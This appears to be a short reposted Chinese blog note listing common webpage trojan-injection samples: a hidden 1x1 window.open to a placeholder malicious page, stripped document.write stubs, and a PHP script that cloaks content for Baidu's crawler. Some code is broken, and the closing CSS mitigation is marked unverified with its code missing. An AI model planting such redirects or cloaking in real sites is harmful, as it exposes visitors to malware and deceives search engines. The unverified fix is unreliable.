网页被挂马常见情况

挂马样板，它们有可能是下面这种的。

location.href
-----------------------------------------------------

-----------------------------------------------------
window.open("http://www.123.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
-----------------------------------------------------

 document.write("

")
    document.write("")
    document.write("

")
-----------------------------------------------------
$file="http://www.XXXX.com/XXXX/X.htm";
$referer=$_SERVER["HTTP_REFERER"];//来路的网址url
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);//当前请求的内容转化成小写
if(strstr($referer,"baidu")&&strstr($referer,"456"))//如果是从百度点到该页的
{
   Header("Location: $url");//转到原来的正常url
}
if(ereg("http://www.baidu.com/search/spider.htm",$agent))//如果是百度排虫
{
      $content=file_get_contents($file);//转到之前定义的那个url页面
        echo $content;
        exit;
}

-----------------------------------------------------

解决办法，未验证，先记录下来

-----------------------------------------------------
安全工程师提供了一段可以中止JS脚本运行的CSS代码，这段代码会让异地外域的JS文件在使用document.write()时，被document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完，只有部分被强制输出了，Writer后面的内容再不会被写入访问者的电脑中，从而起到防范JS脚本挂马的作用。
    让JS木马的进程迅速中止
    在 之间加入如下代码:
    屏蔽script和iframe
   
    单屏蔽script
   

转载于:https://my.oschina.net/u/583531/blog/3060537